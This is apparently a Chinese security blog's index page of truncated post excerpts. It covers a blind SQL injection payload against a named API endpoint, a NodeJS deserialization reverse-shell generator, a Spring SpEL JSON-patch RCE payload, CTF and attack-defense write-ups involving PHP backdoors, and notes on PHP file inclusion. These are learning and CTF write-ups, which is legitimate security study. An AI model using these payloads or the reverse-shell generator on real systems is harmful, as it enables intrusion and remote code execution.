c0ll4r

background看见微信群有人发了篇文章，这个系统我以前挖过，没找到过哪儿能rce的地方，就有点好奇他怎么找出来的。 https://mp.weixin.qq.com/s/32BdBIP0X7YvxLZeIBUqPw 这个注入也挺简单的，直接时间盲注 poc存在SQL注入的点位http://xxxxxxxx/api/client/departments2tree.php该页面POST提交的参数usernumber存在时间盲注Payload：addr=&content=&enddate=&executor=&file1=&filetype1=&fileurl=&lang=zh&priority=&relevanter=&sign=69528b7d5fec328f9b25fb1c0a67b2f8&startdate=&timestamp=1670555316267&title=&usernumber=100101'and(select*from(select+sl ...

background中秋节暗月师傅搞活动，出了个靶场然后做出来的送月饼，看了天

background平时基本都用不上APP抓包，大抵是因为还没工作用不上。抓一些微信小程序的包我都是proxifier代理到burp。至于APP的包之前都是导入证书然后直接抓，现在不行了。好像是应为不再信任第三方证书了，所以要把证书放到系统里面去，参考。https://blog.csdn.net/qq_40731934/article/details/124830493?ops_request_misc=&request_id=&biz_id=102&utm_term=burp%E6%8A%93%E5%8F%96%E5%A4%9C%E7%A5%9E%E6%A8%A1%E6%8B%9F%E5%99%A8&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-124830493.142%5Ev66%5Ejs_top,201%5Ev3%5Econtrol_2,213%5Ev2%5 ...

background水文一篇，没啥含金量，有手进行的东西，是我太菜了，所以觉得值得记录一下 就是一个首先输入身份信息然后返回该账号是否存在的功能点，没有验证码。正常情况下肯定burp一把梭了。但是这里发现提交的数据是被处理过了的，并不是原始的明文。乍一看就是base64，然后去解码发现解出来的全是乱码。那没法了，只能去看看前端是怎么处理的。 点击“下一步”就是直接验证用户是否存在，这里调用的是nextStep()方法找到了nextstep方法的具体操作了，account参数经encryptAES方法处理在js文件里面找到了encryptAES方法的具体操作，知道AES是对称加密，这里面也有了秘钥，那这不就来了吗？我找了很多的在线网站，都没能成功加密，我很疑惑。也不知道是啥情况。对于这些算法我也是一概不懂。但encryptAES方法就是对字符串进行AES之后再base64的。我直接用python先AES再base64之后也不行。提交过去就显示数据格式错误(这点蛮好的，方便我排错。要是统一显示账号不存在，那我可能一直走在错误的道路上也不知道)最后还是ChatGPT救了我，其实这是一个很简单 ...

漏洞成因调用了unserialize()函数假设对cookie参数进行了unserialize操作，即可触发漏洞 exp#!/usr/bin/python# Generator for encoded NodeJS reverse shells# Based on the NodeJS reverse shell by Evilpacket# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)# Insecurety Research (2013) - insecurety.netimport sysif len(sys.argv) != 3: print ("Usage: %s <LHOST> <LPORT>" % (sys.argv[0])) sys.exit(0)IP_ADDR = ...

漏洞原理分析https://zhuanlan.zhihu.com/p/166373950 打法'''首先访问/api/people POST提交JSON数据{"firstName":"w3","lastName":"lkin"}来创建一个用户接着访问返回地址改为PATCH请求 content-type改为application/json-patch+jsonexp[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{生成的数字}))/lastname", "value": "whatever" }]'''payload = ...

background在某次内部赛中遇见的的题，我打了一天都没做出来。整场就一道web，给我整不会了，60人平台带不动，只能给两个环境题，一道web一道pwn，sb平台不能限制用户启动容器的数量，真tm无语…… 题目简述上来就是一个请输入用户名的页面，输入完成后跳转到商品页面。点击商品详情就显示“hello XXX，这件商品的价格是XXX”点击buyflag提示money money money抓包分析发现就是通过session来进行鉴权的，session不对就会跳转到一个页面一开始不知道也没想那么多，jwt解了一下发现是hs256，扫了目录没发现私钥就直接和jwt杠上了，改none这些都没用，然后就执着的跑key，rockyou跑完了，各种常见字典都跑了，还生成了4位数所有密码的排列组合，都无效。 后面想到了hello**，于是才想起来考点可能在ssti(当时比赛的时候有师傅说这题是xss，没毛病，确实有xss,hhhhh)，49，{77}都直接报错了。接下来就是常规操作，但是一直报错，给我整到怀疑人生了。在报错页面我看到了部分源码的我发现了代码里面写的commodity.name，c ...

background没啥含金量，一次内部的练习赛，是个人赛，记录下来是觉得这个平台很有意思。2个半小时，一人运维6台机器，都是web机器，tql上来就直接打，压根没有fix阶段，我全程都在写attack脚本，所以压根没管fix，感觉师傅们都有点摆烂，所以还是我侥幸拿了第一 详情6台机器，有一台ssh上不去，应该是平台的问题。4台机子都是直接内置eval后门，d盾扫一下就出来了，还有一台也是内置后门，只不过做了点手段 //action.php<?phprequire_once("library/common.php");require_once("library/view.php");$page = filter($_POST['page']).'.php';$post_data = array();foreach ($_POST as $key => $value) { $post_data[$key] = $value;}if (file_exists($page)) ...

mysql基础数据库层面的增删改查 CREATE DATABASE test; //创建名为test的数据库DROP DATABASE test; //删除名为test的数据库CREATE table `admin`(`user` varchar(255) NULL,`pass` varchar(255) NULL); //创建admin表alter table test drop id; //删除test表中的id字段alter table test add column id int default 0 first; //在test表中添加id字段alter table test modify id int auto_increment primary key; //修改test表中id字段为自增主键alter table test rename to date; //将test表修改为data表Show databases; //查询所有数据库 数据层面的增删改查 insert into student(name,sex,yea ...

PHP中文件包含常见的函数include：找不到被包含的文件时只会产生警告，脚本将继续执行。include_once：和include()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。require：找不到被包含的文件时会产生致命错误，并停止脚本。require_once：和require()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。 伪协议file:// — 访问本地文件系统http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsphp:// — 访问各个输入/输出流（I/O streams）zlib:// — 压缩流data:// — 数据（RFC 2397）glob:// — 查找匹配的文件路径模式phar:// — PHP 归档ssh2:// — 安全外壳协议 2rar:// — RARogg:// — 音频流expect:// — 处理交互式的流 php://filter我们使用php://filter/convert.base64-encod ...